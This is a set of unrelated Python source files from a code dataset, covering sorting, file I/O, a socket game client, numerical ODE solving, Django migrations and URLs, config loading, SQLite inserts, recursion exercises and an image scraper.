{"seq_id":"221136914","text":"from array import array as arr\n\n# Bubble Sort\n#a = arr('i',[4,3,5,45,23,76,45,98,76,12,24,33])\n#a = arr('i',[1,2,3,4,5,6,7,8,9,10])  # best case - zero swaps\na = arr('i',[10,9,8,7,6,5,4,3,2,1])  # worst case - n(n-1)/2 swaps\nprint(\"Bubble Sort\")\nprint(\"array before sorting:\")\nprint(a)\n\ndef swap(a, i, j):\n    temp = a[i]\n    a[i] = a[j]\n    a[j] = temp\n\n\n#total_swaps = 0\n#total_comparisons = 0\nfor i in range(0, len(a)):\n    #swap = 0\n    #comparison = 0\n    for j in range(0, len(a)-i-1):\n        #comparison += 1\n        if (a[j] > a[j+1]):\n            swap(a, j, j+1)\n            #swap += 1\n    #total_swaps = total_swaps + swap\n    #total_comparisons = total_comparisons + comparison\n    #print(f\"Pass {i} : No. 
of Comparisons={comparison}, No of swaps={swap}\")\n\nprint(a)\n","sub_path":"Searching_Sorting/Bubble_Sort.py","file_name":"Bubble_Sort.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"25397433","text":"#!/usr/bin/env python3\n\"\"\"\n1. Create a file name; if it already exists, choose a different name\n2. Gather the content to be entered\n3. Write the content to the file\n\"\"\"\nimport os\n\ndef getfile():\n    while True:\n        fname = input(\"Please enter a file name: \")\n        if os.path.exists(fname):\n            print(\"%s already exists, please try again:\" % fname)\n        else:\n            break\n    return fname\n\ndef getcontent():\n    print(\"Please enter the text ('end' finishes input):\")\n    content = []\n    while True:\n        line = input(\">\")\n        if line == \"end\":\n            break\n        content.append(line)\n    return content\n\ndef wfile(fname, content):\n    with open(fname, 'w') as fobj:\n        fobj.writelines(content)\n\nif __name__ == \"__main__\":\n    fname = getfile()\n    content = getcontent()\n    content = ['%s\\n' % line for line in content]\n    wfile(fname, content)\n","sub_path":"STEP05/project/lianxi/mktxt.py","file_name":"mktxt.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"393724870","text":"from .base_pipeline_builder import BasePipelineBuilder\nfrom .pipeline import Pipeline\nfrom .pipeline_step import PipelineStep\n\n\nclass ExtractorPipelineBuilder(BasePipelineBuilder):\n    \"\"\"\"\"\"\n\n    def __init__(self):\n        \"\"\"\"\"\"\n\n        self.post_processors = []\n\n    def set_mapping(self, v):\n        \"\"\"\"\"\"\n\n        self.mapping = v\n        return self\n\n    def set_extractor(self, v):\n        \"\"\"\"\"\"\n\n        self.extractor = v\n        return self\n\n    def add_post_processor(self, v, i=None):\n        \"\"\"\"\"\"\n\n        if i is None:\n            self.post_processors.append(v)\n        else:\n            self.post_processors.insert(i, v)\n        return self\n\n    def build(self):\n        \"\"\"\"\"\"\n\n        self.extractor.mapping = self.mapping\n\n        extractor_step = PipelineStep(\n            self.extractor.extract\n        )\n\n        post_processor_steps = [\n            PipelineStep(post_processor.process)\n            for post_processor in self.post_processors\n        ]\n\n        steps = [\n            extractor_step,\n            *post_processor_steps\n        ]\n\n        return Pipeline(\n            steps=steps\n        )\n","sub_path":"src/magnesium/pipeline/extractor_pipeline_builder.py","file_name":"extractor_pipeline_builder.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"108316623","text":"import pandas as pd\nimport os\nimport json\n\n\ndef get_details(s):\n    a = os.path.basename(s)\n    a = a.split('-')\n    if a[2].__contains__('.xlsx'):\n        a[2] = a[2][:-5]\n    return a[0], a[1], a[2]  # 0: materia | 1: unidad | 2: categoria\n\ndef classify_dataframe(f):\n    df = pd.read_excel(f)\n    materia, unidad, categ = get_details(f)\n    df['Categoria'] = pd.Series([categ]*len(df))\n    df['Materia'] = pd.Series([materia]*len(df))\n    df['Unidad'] = pd.Series([unidad]*len(df))\n    return df\n\ndef get_json_pregs():\n    dirname = 'Excels/'\n    for root, dirs, files in os.walk(dirname):\n        f = files\n\n    names = [os.path.join(dirname, filename) for filename in f]\n    dfs = [classify_dataframe(name) for name in names]\n\n    df = pd.concat(dfs, axis=0)\n\n    pr = []\n    for i, row in df.iterrows():\n        d = {}\n        d.update({'Respuestas': row[1:5]})\n        d.update({'Preguntas': row['Preguntas']})\n        d.update({'Categoria': row['Categoria']})\n        d.update({'Materia': row['Materia']})\n        d.update({'Unidad': row['Unidad']})\n\n        pr = pr + [d]\n\n    return 
json.dumps(pr)\n","sub_path":"noticiados_app/noticiados_app/ex_to_json.py","file_name":"ex_to_json.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361332683","text":"#!/bin/env python3\n\nimport arrow\nimport argparse\nimport io\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--start', help = 'Start date of WFH. ISO8601 date format')\nparser.add_argument('--end', help = 'End date of WFH. ISO8601 date format')\nparser.add_argument('--office', help = 'File containing ISO-8601 dates when present at the office')\n\nargs = parser.parse_args()\n\nstart = arrow.get(args.start)\nend = arrow.get(args.end)\nofficeFile = args.office\n\nholidays = []\noffice = []\n\nif officeFile is not None:\n with open(officeFile, 'r') as at_office:\n file_content = at_office.readlines()\n\n for office_date in file_content:\n office.append(office_date.strip())\n\nwith open('holidays.txt', 'r') as publicHolidays:\n file_content = publicHolidays.readlines()\n\n for current_line in file_content:\n holidays.append(current_line.strip())\n\nwith open('wfh.csv', 'w') as schedule:\n schedule.write('Date, Day, Location\\n')\n\n for current_date in arrow.Arrow.span_range('day', start, end):\n date = current_date[0]\n\n if date.isoweekday() in range(1,6):\n str_date = date.format(\"YYYY-MM-DD\")\n\n if str_date in holidays:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Public Holiday\\n\")\n elif str_date in office:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Working at employers office\\n\")\n else:\n schedule.write(str_date + \",\" + date.format(\"dddd\") + \",Working from home\\n\")\n\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"567737908","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 15 20:17:53 2018\n\n不定數迴圈, break at -9999\n\"\"\"\n\nwhile True:\n y = eval(input(\"Enter a year number: \"))\n if y != -9999:\n if y % 400 == 0 or (y % 4 == 0 and y % 100 != 0):\n print('%d is a leap year.' % (y))\n else:\n print('%d is not a leap year.' % (y))\n else:\n break\n\n\"\"\"\ndef isLeap(y):\n if y % 400 == 0 or (y % 4 == 0 and y % 100 != 0):\n print('%d is a leap year.' % (y))\n else:\n print('%d is not a leap year.' % (y))\n \ndef main():\n while True:\n ye = eval(input(\"Enter a year number: \"))\n if ye != -9999:\n isLeap(ye)\n else:\n break\n \nmain()\n\"\"\" ","sub_path":"textbook/sample-code_s1_s2/s1_loop_3_isLeap.py","file_name":"s1_loop_3_isLeap.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"518828321","text":"\"\"\"\nThis is a simple example of a client program written in Python.\nAgain, this is a very basic example to complement the 'basic_server.c' example.\n\n\nWhen testing, start by initiating a connection with the server by sending the \"init\" message outlined in \nthe specification document. Then, wait for the server to send you a message saying the game has begun. \n\nOnce this message has been read, plan out a couple of turns on paper and hard-code these messages to\nand from the server (i.e. play a few rounds of the 'dice game' where you know what the right and wrong \ndice rolls are). 
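The leap-year test used in the record above (divisible by 400, or by 4 but not by 100) is easy to isolate and spot-check; a minimal sketch:

```python
def is_leap(y):
    # Gregorian rule, matching the condition in the snippet above
    return y % 400 == 0 or (y % 4 == 0 and y % 100 != 0)

assert is_leap(2000) and is_leap(2020)
assert not is_leap(1900) and not is_leap(2021)
```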
You will be able to edit this trivially later on; it is often easier to debug the code\nif you know exactly what your expected values are. \n\nFrom this, you should be able to bootstrap message-parsing to and from the server whilst making it easy to debug.\nThen, start to add functions in the server code that actually 'run' the game in the background. \n\"\"\"\n\nimport socket\nfrom time import sleep\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 4444)\nprint('connecting to %s port %s' % server_address)\nsock.connect(server_address)\ncount=0\nsleep(30)\nmessage = 'INIT'.encode()\nsock.sendall(message)\nmoves = [\",MOV,EVEN\",\",MOV,EVEN\",\",MOV,CON,1\",\",MOV,ODD\",\",MOV,CON,1\",\",MOV,ODD\",\",MOV,CON,1\",\",MOV,ODD\"]\ni = 0\ntry:\n    while True:\n        \n        exit = False\n        # Look for the response\n        amount_received = 0\n        amount_expected = len(message)\n        \n        while amount_received < amount_expected:\n            data = sock.recv(1024)\n            amount_received += len(data)\n            mess = data.decode()\n            if \"WELCOME\" in mess:\n                id = mess.split(\",\")[1]\n            if \"START\" in mess:\n                print(\"The games have begun\")\n                print('received \"%s\"' % mess)\n                sock.sendall((str(id) + moves[i]).encode()) # Client has ID 231\n                i = i +1\n            elif \"ELIM\" in mess:\n                print('received \"%s\"' % mess)\n                print(\"We lost, closing connection\")\n                exit = True\n                break\n            elif \"PASS\" in mess or \"FAIL\" in mess:\n                print('received \"%s\"' % mess)\n                sock.sendall((str(id) + moves[i]).encode())\n                i = i+1\n                print('Sending con message')\n            else:\n                print('received \"%s\"' % mess)\n        if exit:\n            break\nfinally: \n    print('closing socket')\n    sock.close()\n","sub_path":"socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584874700","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProblem 1: Python code for solving initial value problem using backward integration with Euler's method\nCreated on Wed Apr  1 13:28:50 2020\n\n@author: krishnendu\n\"\"\"\n\nimport numpy as np\nfrom scipy.optimize import *\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import *\n#Problem 1: \ndef fun1(y):    #defining the function for derivative \n    return -9*y\n\ndef func1(x,y):   #defining the function for doing the implicit Euler's method\n    return x-y-h1*fun1(x)\n\na1=0   #starting point \nb1=1    #ending point\nN1=100   #number of mesh points\nx1=np.linspace(a1,b1,N1)   #creating mesh point\nh1=(b1-a1)/(N1-1)   #step size\nw1=np.zeros(N1)\nf1=np.zeros(N1)\nw1[0]=np.exp(1)   #putting the initial condition\nf1[0]=np.exp(1)   #putting the initial condition\nfor i in range(N1-1):   #iteration \n    f1[i+1]=f1[i]+h1*fun1(w1[i])   #finding the guess value for implicit Euler's method using explicit Euler's method\n    \n    w1[i+1]=newton(func1,f1[i+1],args=(w1[i],))   #finding the value of y\n\nplt.plot(x1,w1,label=\"Implicit Euler's method\") \nplt.xlabel(\"x\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 1-(a)\",size=18)\nplt.legend()\nplt.grid()\nplt.show()\n\n#Problem 2:\n\na2=0   #starting point \nb2=1    #ending point\nN2=100   #number of mesh points\nx2=np.linspace(a2,b2,N2)   #creating mesh point\nh2=(b2-a2)/(N2-1)   #step size\n\ndef fun2(y,x):    #defining the function for derivative \n    return -20*(y-x)**2+2*x\n\ndef func2(x,y,z):   #defining the function for doing the 
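To exercise the socket client above without the real game server, a throwaway local stand-in that speaks a few canned protocol lines is handy. This is a sketch under the assumption that the wire format matches the WELCOME/START/PASS strings the client parses; the real server's messages may differ:

```python
import socket, time

# Throwaway stand-in for the game server, for manual testing of the client above.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(('localhost', 4444))
srv.listen(1)
conn, _ = srv.accept()
print('client sent:', conn.recv(1024).decode())   # expect INIT
conn.sendall(b'WELCOME,231')                      # hand the client an ID
time.sleep(0.5)                                   # avoid coalescing messages
conn.sendall(b'START')                            # client answers with a move
print('move:', conn.recv(1024).decode())
conn.sendall(b'PASS')                             # client sends its next move
print('move:', conn.recv(1024).decode())
conn.close(); srv.close()
```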
implicit Euler's method\n return x-y-h2*fun2(x,z)\n\nw2=np.zeros(N2)\nf2=np.zeros(N2)\nw2[0]=1/3 #putting the initial value\nf2[0]=1/3 #putting the initial value\nfor i in range(N2-1): #iteration\n f2[i+1]=f2[i]+h2*fun2(w2[i],x2[i]) #finding the guess value for implicit Euler's method using explicit Euler's method\n \n w2[i+1]=newton(func2,f2[i+1],args=(w2[i],x2[i+1],)) #finding value of y\n \nplt.plot(x2,w2,label=\"Implicit Euler's method\")\nplt.xlabel(\"x\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 1-(b)\",size=18)\nplt.legend()\nplt.grid()\nplt.show()","sub_path":"problem_1_assign_2.py","file_name":"problem_1_assign_2.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"213345914","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, prev, next, child):\n self.val = val\n self.prev = prev\n self.next = next\n self.child = child\n\"\"\"\n\nclass Solution(object):\n def flatten(self, head):\n \"\"\"\n :type head: Node\n :rtype: Node\n \"\"\"\n if head == None or (head.next == None and head.child == None):\n return head\n stack = []\n node = head\n tail = None\n while node != None:\n if node.child != None:\n tmp = node.child\n node.child = None\n if node.next != None:\n stack.append(node.next)\n tmp.prev = node\n node.next = tmp\n node = tmp\n else:\n tail = node\n node = node.next\n while len(stack) > 0:\n top = stack.pop()\n tail.next = top\n top.prev = tail\n tail = top\n while top.next != None:\n top = top.next\n tail = top\n return head\n","sub_path":"dataStructure/LinkedList/Flatten.py","file_name":"Flatten.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"224574278","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport tools.fields\nimport tools.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frame', '0006_auto_20180524_0937'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='InterfaceLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('operating_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u64cd\\u4f5c\\u65f6\\u95f4')),\n ('operator_address', models.GenericIPAddressField(null=True, verbose_name='\\u64cd\\u4f5c\\u7aef\\u5730\\u5740', blank=True)),\n ('operator_type', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u7c7b\\u578b', blank=True)),\n ('operation_object', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u5bf9\\u8c61', blank=True)),\n ('operating_results', models.CharField(max_length=200, null=True, verbose_name='\\u64cd\\u4f5c\\u7ed3\\u679c', blank=True)),\n ('detail_info', models.TextField(max_length=500, null=True, verbose_name='\\u8be6\\u7ec6\\u4fe1\\u606f', blank=True)),\n ('app', models.CharField(max_length=20, verbose_name='\\u5173\\u8054\\u5e94\\u7528')),\n ],\n options={\n 'verbose_name': '\\u63a5\\u53e3\\u65e5\\u5fd7',\n 'verbose_name_plural': '\\u63a5\\u53e3\\u65e5\\u5fd7',\n },\n ),\n migrations.CreateModel(\n name='SessionTicket',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('session_key', tools.fields.FixEncryptedCharField(max_length=255)),\n ('ticket', tools.fields.FixEncryptedCharField(max_length=255)),\n 
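For the linear test problem y' = -9y in part (a) above, the backward-Euler update can be solved algebraically instead of with newton: y_{n+1} = y_n + h*(-9*y_{n+1}) rearranges to y_{n+1} = y_n/(1+9h). A quick sketch verifying the two approaches agree on one step:

```python
import numpy as np
from scipy.optimize import newton

h = 1.0 / 99                      # same step as N1=100 mesh points on [0, 1]
y = np.exp(1)                     # same initial condition as above
y_closed = y / (1 + 9 * h)        # algebraic backward-Euler step
y_newton = newton(lambda z: z - y + 9 * h * z, y)  # root of z = y - 9*h*z
assert abs(y_closed - y_newton) < 1e-10
```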
],\n ),\n migrations.CreateModel(\n name='UserLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('operating_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u64cd\\u4f5c\\u65f6\\u95f4')),\n ('operator_address', models.GenericIPAddressField(null=True, verbose_name='\\u64cd\\u4f5c\\u7aef\\u5730\\u5740', blank=True)),\n ('operator_type', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u7c7b\\u578b', blank=True)),\n ('operation_object', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u5bf9\\u8c61', blank=True)),\n ('operating_results', models.CharField(max_length=200, null=True, verbose_name='\\u64cd\\u4f5c\\u7ed3\\u679c', blank=True)),\n ('detail_info', models.TextField(max_length=500, null=True, verbose_name='\\u8be6\\u7ec6\\u4fe1\\u606f', blank=True)),\n ('user', models.CharField(max_length=20, verbose_name='\\u7528\\u6237')),\n ],\n options={\n 'verbose_name': '\\u7528\\u6237\\u65e5\\u5fd7',\n 'verbose_name_plural': '\\u7528\\u6237\\u65e5\\u5fd7',\n },\n ),\n migrations.RemoveField(\n model_name='passwordcodes',\n name='user',\n ),\n migrations.AddField(\n model_name='userprofile',\n name='hw_email',\n field=tools.fields.EncryptedEmailField(max_length=255, null=True, verbose_name='\\u534e\\u4e3a\\u90ae\\u7bb1', blank=True),\n ),\n migrations.AlterField(\n model_name='app',\n name='secret',\n field=models.CharField(help_text='Required. 16 ~ 128 characters. Letters, digits and special character only.', max_length=200, verbose_name=b'Secret'),\n ),\n migrations.AlterField(\n model_name='apptoken',\n name='key',\n field=tools.fields.EncryptedCharField(max_length=255, verbose_name='Key', blank=True),\n ),\n migrations.AlterField(\n model_name='useraccesscodes',\n name='codes',\n field=models.CharField(max_length=128, verbose_name='\\u9a8c\\u8bc1\\u7801'),\n ),\n migrations.AlterField(\n model_name='usercodes',\n name='codes',\n field=models.CharField(max_length=128, verbose_name='\\u9a8c\\u8bc1\\u7801'),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='is_active_type',\n field=models.IntegerField(default=0, null=True, verbose_name='\\u6ce8\\u9500\\u7c7b\\u578b', blank=True, choices=[(0, '\\u8d26\\u53f7\\u6709\\u6548'), (1, '\\u8d26\\u53f7\\u5230\\u671f'), (2, '\\u8bc1\\u4e66\\u65e0\\u6548'), (3, '\\u90e8\\u95e8\\u6539\\u53d8'), (4, '\\u6ca1\\u6709\\u8d26\\u53f7'), (5, '\\u79bb\\u804c'), (6, '\\u957f\\u671f\\u672a\\u767b\\u5f55'), (7, '\\u5de5\\u53f7\\u53d8\\u66f4')]),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='phone_number',\n field=tools.fields.EncryptedCharField(blank=True, max_length=255, null=True, verbose_name='\\u624b\\u673a\\u53f7\\u7801', validators=[tools.utils.check_phone]),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='safe_email',\n field=tools.fields.EncryptedEmailField(max_length=255, null=True, verbose_name='\\u5b89\\u5168\\u90ae\\u7bb1', blank=True),\n ),\n ]\n","sub_path":"WiseEyeIAMService/frame/migrations/0007_auto_20180704_1654.py","file_name":"0007_auto_20180704_1654.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"310197869","text":"'''\nThe loader is created by the main SaltEventsDaemon. It takes care of loading\nthe given config with a default of '/etc/salt/eventsd'. 
It also takes care of\ninitializing the logger from saltstack.\n'''\n\nimport sys\nimport logging\nimport salt.log\nimport os\nimport yaml\n\nlogger = salt.log.setup.logging.getLogger(__name__)\nlog = logging.getLogger(__name__)\n\n\nclass SaltEventsdLoader(object):\n    '''\n    The loader takes care of reading the config file and\n    setting up the correct logger.\n    '''\n    def __init__(self, config=None, log_level=None, log_file=None, daemonize=False):\n        self.config_file = config if config else \"/etc/salt/eventsd\"\n        # retrieve current settings from the config file\n        self.opts = None\n        self._read_yaml(self.config_file)\n\n        # make sure we have a 'general' section\n        if 'general' in self.opts.keys():\n            self.gen_opts = self.opts['general']\n\n        # Use log level if explicitly set from cli\n        if log_level:\n            self.gen_opts['loglevel'] = log_level\n\n        # Use log file if explicitly set from cli\n        if log_file:\n            self.gen_opts['logfile'] = log_file\n\n        self.gen_opts['daemonize'] = daemonize\n\n        self._init_logger()\n        log.info(\"loaded config from {0}\".format(self.config_file))\n\n    def _init_logger(self):\n        '''\n        sets up the logger used throughout salt-eventsd\n        '''\n        # make sure we have the required settings for our logging\n        if ('logfile' in self.gen_opts) and \\\n           ('loglevel' in self.gen_opts):\n\n            salt.log.setup_logfile_logger(\n                self.gen_opts['logfile'],\n                self.gen_opts['loglevel'],\n            )\n\n            # Only log to foreground if not running as a daemon\n            if not self.gen_opts['daemonize']:\n                salt.log.setup_console_logger(\n                    log_level=self.gen_opts['loglevel'],\n                )\n        else:\n            # if no log settings found, use defaults\n\n            # Only log to foreground if not running as a daemon\n            if not self.gen_opts['daemonize']:\n                salt.log.setup_console_logger(\n                    log_level=\"warn\"\n                )\n\n            salt.log.setup_logfile_logger(\n                '/var/log/salt/eventsd',\n                'warn',\n            )\n\n    def getopts(self):\n        '''\n        returns the parsed options to the SaltEventsDaemon-Class\n        '''\n        return self.opts\n\n    def _read_yaml(self, path):\n        '''\n        reads a yaml-formatted configuration file at the given path and\n        returns a python dictionary with the parsed items in it.\n        '''\n        try:\n            yaml_handle = open(path)\n            self.opts = yaml.load(yaml_handle.read())\n        except yaml.parser.ParserError as yamlerr:\n            print(\"Failed to parse configfile: {0}\".format(path))\n            print(yamlerr)\n            sys.exit(1)\n        except yaml.scanner.ScannerError as yamlerr:\n            print(\"Failed to parse configfile: {0}\".format(path))\n            print(yamlerr)\n            sys.exit(1)\n        except IOError as ioerr:\n            print(\"Failed to read configfile:\")\n            print(os.strerror(ioerr.errno))\n            sys.exit(1)\n        except OSError as oserr:\n            print(\"Failed to read configfile:\")\n            print(os.strerror(oserr.errno))\n            sys.exit(1)\n","sub_path":"salteventsd/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"25485943","text":"import numpy as np\nimport itertools\nfrom sklearn.model_selection import train_test_split\n\ndef create_inp_opt(data):\n    inp_opt = map(lambda x:x.split('='), data)\n    inp_opt_chars = list(map(lambda x: [list(x[0]), list(x[1])], inp_opt))\n    \n    return inp_opt_chars\n\ndef create_vocab(data):\n    inp_opt_merged = list(map(lambda x: list(itertools.chain(*x)), data))\n    vocab = set(itertools.chain(*inp_opt_merged))\n    vocab = vocab.union({'start', 'end'})\n    \n    return vocab\n\ndef create_mapping(vocab):\n    mapping = {}\n    for i, ch in enumerate(sorted(vocab)):\n        mapping[ch] = i+1\n    \n    mapping['pad'] = 0\n    \n    return mapping\n\ndef 
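_read_yaml above calls yaml.load without an explicit Loader, which newer PyYAML versions reject and which is unsafe on untrusted input. A minimal sketch of the safer equivalent (my illustration, not the project's actual code):

```python
import yaml

# safe_load restricts YAML to plain data types (dicts, lists, scalars).
def read_yaml(path):
    with open(path) as handle:
        return yaml.safe_load(handle)
```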
inp_opt(inp_opt_chars, mapping):\n inp_opt_mapped = list(map(lambda x:[[mapping['start']]+[mapping[i] for i in x[0]]+[mapping['end']], \n [mapping['start']]+[mapping[i] for i in x[1]]+[mapping['end']]], inp_opt_chars))\n \n inp = list(map(lambda x:x[0], inp_opt_mapped))\n opt = list(map(lambda x:x[1], inp_opt_mapped))\n \n return inp, opt\n\nfile = open('dataset.txt','r')\ndata = file.read()\n\ndata = data.split('\\n')[:-1]\n\ntrain, test = train_test_split(data, test_size=0.10, random_state=1)\ntrain, val = train_test_split(train, test_size=0.10, random_state=1)\n\nwith open('train.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in train)\n \nwith open('valid.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in val)\n \nwith open('test.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in test)\n","sub_path":"transformer/dataprocessing.py","file_name":"dataprocessing.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"215358186","text":"from django.conf.urls.defaults import *\n\n# JC: Add urls.py branch to deal with JSON / DATA / API requests. Clean things up.\n# Notes:\n# Allow for endings in / or \"\" where possible\n#\nurlpatterns = patterns('v1',\n (r'api/(?Ptopic)/(?P\\d+)/(?Pstories)/', include('json.gettopic.urls')),\n (r'api/(?Ptopic)/(?P\\d+)/(?Psubtopics)/', include('json.gettopic.urls')),\n (r'api/(?Ptopic)/(?P\\d+)', include('json.gettopic.urls')),\n (r'api/(?Pstory)/', include('json.getuser.urls')),\n (r'api/(?Ptopic)/', include('topic.urls')),\n (r'location$', include('json.location.urls')),\n (r'location/$', include('json.location.urls'))\n)\n","sub_path":"fishbone/urls-api.py","file_name":"urls-api.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"170238353","text":"import numpy as np\nimport sqlite3\n\ndef _insert(db, sql):\n conn = sqlite3.connect(db)\n curs = conn.cursor()\n if isinstance(sql, list):\n for s in sql:\n curs.execute(s)\n else:\n curs.execute(sql)\n conn.commit()\n conn.close()\n\ndef insertSQL(db, name, price, quantity, chain=False):\n pid = np.random.randint(111111,1000000)\n sql = f'''INSERT INTO inventory (pid,name,price,quantity)\n VALUES ({pid},'{name}',{price},{quantity})'''\n if chain:\n return sql\n _insert(db, sql)\n \ndef mass_insert_test(db):\n names = ['hammer','nails','screws','glass','wood','metal',\n 'canvas','pins','glue','paint','pens','bags']\n prices = [5.99,0.50,0.75,11.99,3.75,5.25,\n 1.99,0.25,2.25,6.75,1.25,0.75]\n quants = np.random.randint(200, 500, len(names))\n sql = []\n for i in range(len(names)):\n sql.append((insertSQL(db, names[i], prices[i], quants[i], chain=True)))\n _insert(db, sql)\n","sub_path":"insertModule.py","file_name":"insertModule.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"412354484","text":"\"\"\"\nWrite a recursive function called palindrome which will receive a word and an index (always 0). 
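insertModule.py above interpolates values straight into the SQL string; sqlite3 supports qmark placeholders, which avoid both quoting bugs and SQL injection. A minimal sketch of the same insert done with parameters (same table layout assumed):

```python
import sqlite3

# Parameterized variant of the insert above; the driver handles quoting.
def insert_item(db, pid, name, price, quantity):
    with sqlite3.connect(db) as conn:  # commits on success
        conn.execute(
            "INSERT INTO inventory (pid, name, price, quantity) VALUES (?, ?, ?, ?)",
            (pid, name, price, quantity),
        )
```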
Implement the function,\nso it returns \"{word} is a palindrome\" if the word is a palindrome and \"{word} is not a palindrome\" if the word is not\na palindrome using recursion.\n\n\"\"\"\n\n\ndef palindrome(word, index):\n    stop = len(word) // 2\n    if index == stop:\n        return f'{word} is a palindrome'\n    if word[index] == word[len(word)-1-index]:\n        return palindrome(word, index+1)\n    else:\n        return f'{word} is not a palindrome'\n\nprint(palindrome(\"abcba\", 0))\nprint(palindrome(\"peter\", 0))","sub_path":"Functions Advanced/recursion_palindrome.py","file_name":"recursion_palindrome.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"295514502","text":"# Image Scraper\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\nimport os\r\n\r\n\r\ndef StartSearch():\r\n    search = input(\"Search for:\")\r\n    params = {\"q\": search}\r\n    # Create a directory name by using the search query, and replacing any spaces with underscores\r\n    dir_name = search.replace(\" \", \"_\").lower()\r\n\r\n    # .path(): This is a function from the OS library that checks the current path of the program\r\n    # isdir(): This is a function from the OS library that checks to see if this is a valid directory name\r\n    if not os.path.isdir(dir_name):\r\n        # .makedirs(): This is a function from the OS library that creates a directory\r\n        # Create the directory:\r\n        os.makedirs(dir_name)\r\n\r\n    r = requests.get(\"http://www.bing.com/images/search\", params=params)\r\n\r\n    soup = BeautifulSoup(r.text, \"html.parser\")\r\n\r\n    # Create a list of \"thumb\" class links, obviously for thumbnail images\r\n    links = soup.findAll(\"a\", {\"class\": \"thumb\"})\r\n\r\n    for item in links:\r\n        try:\r\n            # Use the requests library, and the .get() function to find each of the href locations of all the links\r\n            img_obj = requests.get(item.attrs[\"href\"])\r\n            print(\"Getting:\", item.attrs[\"href\"])\r\n            # Use the .split() function to split the href location\r\n            # [-1]: This is a Python way to index into the last element of a list\r\n            title = item.attrs[\"href\"].split(\"/\")[-1]\r\n            try:\r\n                img = Image.open(BytesIO(img_obj.content))\r\n                # Create a new directory called \"scraped_images\" in the actual Python project\r\n                # .save(): This is a function from the Image library which needs the directory of the image file on your computer\r\n                img.save(\"./\" + dir_name + \"/\" + title, img.format)\r\n            except:\r\n                print(\"Could not save image\")\r\n        except:\r\n            print(\"Could not request image\")\r\n    # This forces the function to call itself again so it loops\r\n    StartSearch()\r\n\r\n\r\n# Call the function:\r\nStartSearch()","sub_path":"python/01PythonStackskillsCourse/06WebScraper/Image 